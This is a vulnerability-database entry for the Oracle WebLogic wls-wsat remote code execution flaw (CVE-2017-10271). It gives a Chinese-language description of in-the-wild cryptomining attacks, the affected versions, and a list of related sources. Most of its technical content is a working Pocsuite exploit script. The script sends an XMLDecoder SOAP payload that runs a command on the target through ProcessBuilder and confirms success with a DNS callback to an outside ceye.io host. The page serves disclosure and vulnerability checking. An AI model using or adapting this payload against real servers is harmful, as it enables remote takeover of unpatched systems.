Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugMy SeebugSSV:97009
HistoryDec 22, 2017 - 12:00 a.m.

Oracle WebLogic wls-wsat RCE(CVE-2017-10271)

2017-12-2200:00:00
My Seebug
www.seebug.org
838

0.974 High

EPSS

Percentile

99.9%

JSON

漏洞描述

黑客利用WebLogic 反序列化漏洞(CVE-2017-3248)和WebLogic WLS 组件漏洞(CVE-2017-10271)对企业服务器发起大范围远程攻击,有大量企业的服务器被攻陷,且被攻击企业数量呈现明显上升趋势,需要引起高度重视。其中,CVE-2017-10271是一个最新的利用Oracle WebLogic中WLS 组件的远程代码执行漏洞,属于没有公开细节的野外利用漏洞,大量企业尚未及时安装补丁。官方在 2017 年 10 月份发布了该漏洞的补丁。

该漏洞的利用方法较为简单,攻击者只需要发送精心构造的 HTTP 请求,就可以拿到目标服务器的权限,危害巨大。由于漏洞较新,目前仍然存在很多主机尚未更新相关补丁。预计在此次突发事件之后,很可能出现攻击事件数量激增,大量新主机被攻陷的情况。

攻击者能够同时攻击Windows及Linux主机,并在目标中长期潜伏。由于Oracle WebLogic的使用面较为广泛,攻击面涉及各个行业。此次攻击中使用的木马为典型的比特币挖矿木马。但该漏洞可被黑客用于其它目的攻击。

影响版本

  • Oracle Weblogic Server 10.3.6.0

  • Oracle Weblogic Server 12.2.1.2

  • Oracle Weblogic Server 12.2.1.1

  • Oracle Weblogic Server 12.1.3.0


                                                #!/usr/bin/env python
# coding: utf-8
import random
import string
import urlparse
import time

from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
from pocsuite.lib.core.data import logger


class TestPOC(POCBase):
    vulID = '97009'
    version = '1'
    author = ''
    vulDate = '2017-10-23'
    createDate = '2017-12-22'
    updateDate = '2017-12-22'
    references = [
        'https://www.seebug.org/vuldb/ssvid-97009',
    ]
    name = 'Oracle WebLogic wls-wsat RCE(CVE-2017-10271)'
    appPowerLink = 'https://www.oracle.com/middleware/weblogic/index.html'
    appName = 'WebLogic'
    appVersion = ''
    vulType = 'Remote Command Execution'
    desc = '''
    Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。Oracle WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件。
Oracle Fusion Middleware中的Oracle WebLogic Server组件的WLS Security子组件存在安全漏洞。攻击者可利用该漏洞控制组件,影响数据的可用性、保密性和完整性。以下组版本受到影响:Oracle WebLogic Server 10.3.6.0.0版本,12.1.3.0.0版本,12.2.1.1.0版本,12.2.1.2.0版本。

    '''

    samples = []

    def verify_request(self, token, type, flag):
        retVal = False
        counts = 3
        url = "http://api.ceye.io/v1/records?token={token}&type={type}&filter={flag}".format(token=token, type=type, flag=flag)
        while counts:
            try:
                time.sleep(1)
                resp = req.get(url)
                if resp and resp.status_code == 200 and flag in resp.content:
                    retVal = True
                    break
            except Exception as ex:
                logger.warn(ex.message)
                time.sleep(1)

            counts -= 1

        return retVal


    def test_uri(self, uri):
        flag = "".join(random.choice(string.ascii_letters) for _ in xrange(0, 8))
        headers = {
            'SOAPAction': "",
            'Content-Type': 'text/xml;charset=UTF-8'
        }
        path = '/wls-wsat/CoordinatorPortType11'
        url = urlparse.urljoin(uri, path)
        postdata = """
            <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">  
                    <soapenv:Header> 
                        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">  
                        <java version="1.8.0_131" class="java.beans.XMLDecoder"> 
                            <object class="java.lang.ProcessBuilder"> 
                            <array class="java.lang.String" length="2"> 
                                <void index="0"> 
                                <string>nslookup</string> 
                                </void>  
                                <void index="1"> 
                                <string>{0}.dns.j3170ioc.ceye.io</string> 
                                </void>  
                            </array>  
                            <void method="start"/> 
                            </object> 
                        </java> 
                        </work:WorkContext> 
                    </soapenv:Header>  
                    <soapenv:Body/> 
                </soapenv:Envelope>
            """.format(flag)
        try:
            resp = req.post(url, data=postdata, headers=headers)
            if resp.status_code == 500 and self.verify_request(token="5df9bef9ed0d27df6f8csc1452b99b5b2p", type="dns", flag=flag):
                return True

        except Exception as ex:
            logger.warning(ex.message)
        return False


    def _verify(self):
        result = {}
        pr = urlparse.urlparse(self.url)
        ports = [7001]
        if pr.port not in ports:
            ports.insert(0, pr.port)
        for port in ports:
            uri = "{0}://{1}:{2}".format(pr.scheme, pr.hostname, str(port))
            if self.test_uri(uri):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = uri
                break

        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output



register(TestPOC)

Related

fireeye 6
nessus 4
metasploit 1
attackerkb 1
hackerone 2
prion 2
zdt 3
cisa_kev 1
cve 2
nuclei 1
exploitpack 3
packetstorm 3
malwarebytes 1
securelist 4
symantec 1
zdi 1
checkpoint_advisories 2
exploitdb 4
talosblog 4
threatpost 11
thn 3
pentestit 1
openvas 2
githubexploit 1
kitploit 3
cisa 1
qualysblog 2
impervablog 1
oracle 2
fireeye
fireeye
Click It Up: Targeting Local Government Payment Portals
2018-09-19 10:00:00
Malicious PowerShell Detection via Machine Learning
2018-07-10 12:00:00
CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of Techniques Used Post-Exploitation and Pre-Mining
2018-02-15 16:30:00
nessus
nessus
Oracle WebLogic WSAT Remote Code Execution
2017-12-28 00:00:00
Oracle WebLogic Java Object RMI Connect-Back Deserialization RCE (January 2017 CPU)
2017-01-26 00:00:00
Oracle WebLogic Server Java Object RMI Connect-Back Deserialization RCE (January 2017 CPU)
2017-01-18 00:00:00
metasploit
metasploit
Oracle WebLogic wls-wsat Component Deserialization RCE
2018-01-05 20:05:21
attackerkb
attackerkb
CVE-2017-10271 - Oracle WebLogic Server AsyncResponseService Deserialization Vulnerability
2017-10-19 00:00:00
hackerone
hackerone
MTN Group: Remote OS Command Execution on Oracle Weblogic server via [CVE-2017-10271]
2020-03-04 13:45:59
U.S. Dept Of Defense: RCE on █████ via CVE-2017-10271
2019-05-10 22:23:31
prion
prion
Design/Logic Flaw
2017-10-19 17:29:00
Design/Logic Flaw
2017-01-27 22:59:00
zdt
zdt
Oracle WebLogic < 10.3.6 - wls-wsat Component Deserialisation Remote Command Execution Exploit
2018-01-08 00:00:00
Oracle WebLogic - wls-wsat Component Deserialization Remote Code Execution Exploit
2018-01-29 00:00:00
Oracle WebLogic 12.1.2.0 RMI Registry UnicastRef Object Java Deserialization Remote Code Execution
2018-07-10 00:00:00
cisa_kev
cisa_kev
Oracle Corporation WebLogic Server Remote Code Execution Vulnerability
2022-02-10 00:00:00
cve
cve
CVE-2017-10271
2017-10-19 17:29:00
CVE-2017-3248
2017-01-27 22:59:00
nuclei
nuclei
Oracle WebLogic Server - Remote Command Execution
2021-02-03 00:48:46
exploitpack
exploitpack
Oracle WebLogic Server 10.3.6.0.0 12.x - Remote Command Execution
2017-12-26 00:00:00
Oracle WebLogic 10.3.6 - wls-wsat Component Deserialisation Remote Command Execution
2018-01-03 00:00:00
Oracle WebLogic 12.1.2.0 - RMI Registry UnicastRef Object Java Deserialization Remote Code Execution
2018-07-07 00:00:00
packetstorm
packetstorm
Oracle WebLogic wls-wsat Component Deserialization Remote Code Execution
2018-01-28 00:00:00
Oracle WebLogic 12.1.2.0 Remote Code Execution
2018-07-09 00:00:00
Oracle Weblogic Server Deserialization RMI UnicastRef Remote Code Execution
2019-04-02 00:00:00
malwarebytes
malwarebytes
The state of malicious cryptomining
2018-02-26 16:08:03
securelist
securelist
APT trends report Q3 2019
2019-10-16 10:00:26
Andariel deploys DTrack and Maui ransomware
2022-08-09 10:00:46
APT review: what the world’s threat actors got up to in 2019
2019-12-04 10:00:22
symantec
symantec
Oracle WebLogic Server CVE-2017-10271 Remote Security Vulnerability
2017-10-17 00:00:00
zdi
zdi
Oracle WebLogic RMI Registry UnicastRef Object Deserialization of Untrusted Data Remote Code Execution Vulnerability
2017-01-24 00:00:00
checkpoint_advisories
checkpoint_advisories
Oracle WebLogic Server UnicastRef Insecure Deserialization (CVE-2017-3248)
2017-03-29 00:00:00
Oracle WebLogic WLS Security Component Remote Code Execution (CVE-2017-10271; CVE-2017-3506)
2017-12-27 00:00:00
exploitdb
exploitdb
Oracle WebLogic &lt; 10.3.6 - &#039;wls-wsat&#039; Component Deserialisation Remote Command Execution
2018-01-03 00:00:00
Oracle WebLogic Server 10.3.6.0.0 / 12.x - Remote Command Execution
2017-12-26 00:00:00
Oracle WebLogic - wls-wsat Component Deserialization Remote Code Execution (Metasploit)
2018-01-29 00:00:00
talosblog
talosblog
Rocke: The Champion of Monero Miners
2018-08-30 08:26:00
Ransom Where? Malicious Cryptocurrency Miners Takeover, Generating Millions
2018-01-31 07:58:00
Cryptocurrency miners aren’t dead yet: Documenting the voracious but simple “Panda”
2019-09-17 08:09:45
threatpost
threatpost
Muhstik Botnet Exploits Highly Critical Drupal Bug
2018-04-23 22:13:25
New Threat Actor ‘Rocke’: A Rising Monero Cryptomining Menace
2018-08-30 20:35:39
Oracle WebLogic Exploit-fest Continues with GandCrab Ransomware, XMRig
2019-05-06 20:04:55
thn
thn
Hackers Exploiting Drupal Vulnerability to Inject Cryptocurrency Miners
2018-04-18 09:49:00
New Cryptojacking Malware Targeting Apache, Oracle, Redis Servers
2021-02-01 11:15:00
Muhstik Botnet Targeting Redis Servers Using Recently Disclosed Vulnerability
2022-03-28 06:59:00
pentestit
pentestit
UPDATE: Infection Monkey 1.6.1
2018-12-03 22:28:53
openvas
openvas
Oracle WebLogic Server Remote Code Execution Vulnerability (Nov 2016)
2016-11-02 00:00:00
Oracle WebLogic Server Multiple Vulnerabilities (cpujul2017-3236622)
2017-07-19 00:00:00
githubexploit
githubexploit
Exploit for Injection in Oracle Weblogic Server
2019-08-23 01:42:57
kitploit
kitploit
Jok3R - Network And Web Pentest Framework
2019-01-23 12:25:00
Sn1per v7.0 - Automated Pentest Framework For Offensive Security Experts
2019-05-12 13:09:00
Vulmap - Web Vulnerability Scanning And Verification Tools
2020-12-25 11:30:00
cisa
cisa
CISA Adds 15 Known Exploited Vulnerabilities to Catalog
2022-02-10 00:00:00
qualysblog
qualysblog
Top 19+ Vulnerability CVEs in Santa’s Dashboard Tracking
2019-12-27 18:01:22
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR
2022-02-23 05:39:00
impervablog
impervablog
Deserialization Attacks Surge Motivated by Illegal Crypto-mining
2018-01-24 17:45:08
oracle
oracle
Oracle Critical Patch Update Advisory - January 2017
2017-01-17 00:00:00
Oracle Critical Patch Update - October 2017
2017-10-17 00:00:00

0.974 High

EPSS

Percentile

99.9%

JSON
Related for SSV:97009
fireeye6nessus4metasploit1attackerkb1hackerone2prion2zdt3cisa_kev1cve2nuclei1exploitpack3packetstorm3malwarebytes1securelist4symantec1zdi1checkpoint_advisories2exploitdb4talosblog4threatpost11thn3pentestit1openvas2githubexploit1kitploit3cisa1qualysblog2impervablog1oracle2